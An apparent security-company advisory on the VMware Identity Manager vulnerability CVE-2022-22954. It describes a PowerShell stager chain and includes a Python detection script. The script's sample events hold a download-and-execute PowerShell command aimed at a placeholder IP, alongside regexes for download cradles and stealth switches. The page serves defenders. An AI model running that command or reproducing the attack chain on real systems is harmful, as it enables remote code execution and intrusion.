If you suspect an active attack on your business, call our emergency hotline at: 612-399-9680

VMware Backdoor Vulnerability


What is the Vulnerability?

The VMware Backdoor vulnerability is tracked as CVE-2022-22954. By exploiting the VMware Identity Manager (IDM) service, attackers are able to run PowerShell on the server and open malicious communication channels from it.

How Hackers Gain Access

The adversaries gain initial access to the environment by exploiting CVE-2022-22954, the only one of the trio of RCE vulnerabilities that doesn't require administrative access to the target server and that also has a publicly available PoC exploit. The attack starts with executing a PowerShell command on the vulnerable service (Identity Manager), which launches a stager. The stager then fetches the PowerTrash loader from the command and control (C2) server in a highly obfuscated form and loads a Core Impact agent into the system memory. With privileged access, attacks of this type may be able to bypass typical defenses, including antivirus (AV) and endpoint detection and response (EDR).
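For defenders, the chain above has a detectable shape: the Identity Manager service spawning PowerShell whose command line carries download-cradle or obfuscation markers. The following is an added example, not code from the original post; the parent-process names (`idm-service`, `tomcat`), the event field names and the sample events are assumptions constructed for the demo.

```python
# Added example: score process-creation events for the Identity Manager -> PowerShell
# -> remote stager pattern. Log format, parent names and sample events are assumed.
import re
from typing import Iterable

# Hypothetical names of the Identity Manager service process (placeholders).
IDM_PARENTS = {"idm-service", "tomcat"}

# Command-line markers typical of a download-and-run stager.
SUSPICIOUS = [
    re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I),   # encoded payload
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr\b|iex\b|invoke-expression", re.I),
    re.compile(r"-nop\b|-w(indowstyle)?\s+hidden|-noni\b", re.I),    # stealth switches
    re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I),             # raw-IP C2 URL
]

def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return a score and the reasons for one process-creation event."""
    reasons = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("command_line", "")
    if not ("powershell" in image or "pwsh" in image):
        return 0, reasons
    score = 0
    if any(p in parent for p in IDM_PARENTS):
        score += 5
        reasons.append(f"powershell spawned by identity manager process {parent}")
    for rx in SUSPICIOUS:
        if rx.search(cmd):
            score += 2
            reasons.append(f"command line matches /{rx.pattern}/")
    return score, reasons

def find_suspicious(events: Iterable[dict], threshold: int = 5) -> list[dict]:
    """Return events scoring at or above threshold, with reasons attached."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons})
    return hits

# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation IP.
SAMPLE_EVENTS = [
    {"image": "/usr/bin/pwsh", "parent_image": "/opt/idm-service/bin/java",
     "command_line": "pwsh -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')\""},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell Get-Process"},
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
```

The parent-process match carries most of the weight on purpose: PowerShell started by a web-facing identity service is rare in normal operation, while the command-line markers alone appear in benign admin scripts.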

Criticality and Who Is Affected

Anyone running VMware is affected by this vulnerability, and publicly hosted VMware instances are the most exposed. For those who host VMware publicly, our cybersecurity experts rate this vulnerability's criticality at 8 out of 10. For those who have VMware but do not host it publicly, 5 out of 10. For more information, visit its page on the National Vulnerability Database.
